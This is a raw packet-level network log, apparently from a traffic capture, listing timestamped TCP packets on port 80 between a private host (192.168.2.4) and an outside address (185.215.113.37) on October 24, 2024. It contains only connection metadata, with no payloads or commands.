Oct 24, 2024 19:29:17.298415899 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:17.298445940 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:17.298455000 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:17.298482895 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:17.298486948 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:17.298516989 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:17.298522949 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:17.298552036 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:17.298559904 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:17.298584938 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:17.298594952 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:17.298619986 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:17.298629045 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:17.298654079 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:17.298665047 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:17.298687935 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:17.298697948 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:17.298722982 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:17.298732042 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:17.298758030 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:17.298764944 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:17.298793077 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:17.298796892 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:17.298827887 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:17.298834085 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:17.298863888 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:17.298882008 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:17.298898935 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:17.298908949 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:17.298942089 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:17.298943996 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:17.298979044 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:17.298986912 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:17.299010038 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:17.299020052 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:17.299045086 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:17.299046040 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:17.299078941 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:17.299084902 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:17.299113035 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:17.299133062 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:17.299148083 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:17.299160957 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:17.299181938 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:17.299190044 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:17.299216032 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:17.299228907 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:17.299251080 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:17.299263954 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:17.299284935 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:17.299290895 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:17.299339056 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:17.299345970 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:17.299384117 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:17.299393892 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:17.299420118 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:17.299427986 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:17.299463034 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:17.337806940 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:17.337865114 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:17.338054895 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:17.338109970 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:17.340341091 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:17.340398073 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:17.340406895 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:17.340447903 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:17.413306952 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:17.413361073 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:17.413395882 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:17.413429022 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:17.413430929 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:17.413446903 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:17.413463116 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:17.413480043 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:17.413635969 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:17.413691044 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:17.413700104 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:17.413736105 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:17.413757086 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:17.413769007 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:17.413789988 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:17.413805008 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:17.413820982 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:17.413863897 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:17.413866997 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:17.413902998 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:17.413914919 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:17.413949966 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:17.413965940 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:17.414000988 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:17.414010048 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:17.414042950 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:17.414058924 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:17.414160013 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:17.414165020 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:17.414200068 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:17.414247990 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:17.414247990 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:17.414258957 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:17.414282084 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:17.414304018 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:17.414320946 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:17.414331913 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:17.414376974 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:17.414400101 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:17.414434910 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:17.414453030 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:17.414468050 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:17.414474964 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:17.414514065 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:17.414520025 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:17.414554119 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:17.414566040 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:17.414587975 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:17.414602995 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:17.414623022 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:17.414642096 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:17.414654970 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:17.414669037 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:17.414702892 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:17.414719105 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:17.414752960 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:17.414764881 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:17.414787054 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:17.414793968 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:17.414820910 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:17.414833069 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:17.414850950 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:17.414868116 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:17.414892912 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:17.414916992 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:17.414949894 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:17.414962053 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:17.414983988 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:17.414989948 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:17.415018082 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:17.415029049 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:17.415051937 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:17.415062904 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:17.415102959 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:17.415115118 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:17.415147066 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:17.415179968 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:17.415182114 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:17.415203094 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:17.415214062 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:17.415224075 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:17.415247917 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:17.415261984 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:17.415282011 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:17.415302038 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:17.415333986 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:17.415337086 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:17.415380955 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:17.415452003 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:17.415486097 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:17.415496111 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:17.415520906 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:17.415535927 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:17.415555000 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:17.415570021 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:17.415591002 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:17.415611982 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:17.415635109 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:17.415653944 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:17.415685892 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:17.415699959 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:17.415719986 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:17.415730000 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:17.415765047 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:17.415771008 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:17.415829897 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:17.415834904 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:17.415868998 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:17.415877104 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:17.415903091 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:17.415915012 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:17.415937901 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:17.415947914 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:17.415973902 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:17.415992975 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:17.416011095 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:17.416037083 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:17.416043997 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:17.416045904 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:17.416078091 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:17.416085005 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:17.416114092 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:17.416121006 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:17.416146994 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:17.416163921 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:17.416182041 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:17.416188955 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:17.416215897 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:17.416224957 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:17.416260958 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:17.416276932 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:17.416309118 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:17.416318893 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:17.416342974 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:17.416353941 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:17.416380882 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:17.416385889 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:17.416414976 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:17.416430950 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:17.416450024 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:17.416459084 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:17.416491985 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:17.416518927 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:17.416551113 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:17.416568041 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:17.416587114 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:17.416594028 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:17.416624069 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:17.416650057 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:17.416659117 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:17.416662931 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:17.416692972 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:17.416702032 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:17.416728020 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:17.416743040 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:17.416762114 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:17.416781902 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:17.416795969 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:17.416806936 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:17.416829109 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:17.416838884 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:17.416862965 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:17.416870117 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:17.416896105 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:17.416914940 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:17.416929960 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:17.416939020 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:17.416965961 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:17.416973114 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:17.417001009 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:17.417011023 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:17.417035103 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:17.417043924 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:17.417068958 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:17.417078018 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:17.417103052 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:17.417110920 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:17.417146921 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:17.417149067 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:17.417181015 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:17.417188883 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:17.417217016 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:17.417227983 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:17.417252064 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:17.417262077 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:17.417284966 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:17.417294979 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:17.417318106 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:17.417326927 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:17.417352915 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:17.417359114 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:17.417387962 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:17.417396069 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:17.417422056 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:17.417433023 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:17.417455912 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:17.417467117 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:17.417490005 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:17.417499065 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:17.417525053 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:17.417541027 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:17.417562008 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:17.417572021 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:17.417592049 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:17.417609930 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:17.417644978 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:17.458007097 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:17.458025932 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:17.458040953 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:17.458065033 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:17.458095074 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:17.530528069 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:17.530560017 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:17.530591011 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:17.530620098 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:17.530985117 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:17.531001091 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:17.531016111 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:17.531032085 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:17.531033039 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:17.531049013 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:17.531055927 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:17.531070948 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:17.531100035 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:17.531122923 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:17.531127930 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:17.531143904 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:17.531158924 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:17.531172037 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:17.531176090 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:17.531183958 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:17.531209946 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:17.531260014 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:17.531274080 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:17.531289101 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:17.531301975 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:17.531303883 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:17.531322956 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:17.531335115 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:17.531346083 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:17.531402111 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:17.531416893 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:17.531430960 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:17.531445980 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:17.531449080 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:17.531455994 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:17.531476974 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:17.531486988 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:17.531524897 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:17.531538963 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:17.531553030 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:17.531569958 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:17.531588078 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:17.531588078 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:17.531589985 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:17.531600952 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:17.531615019 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:17.531631947 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:17.531661034 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:17.531676054 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:17.531689882 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:17.531712055 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:17.531719923 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:17.531734943 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:17.531737089 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:17.531749964 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:17.531763077 CEST	49730	80	192.168.2.4	185.215.113.37
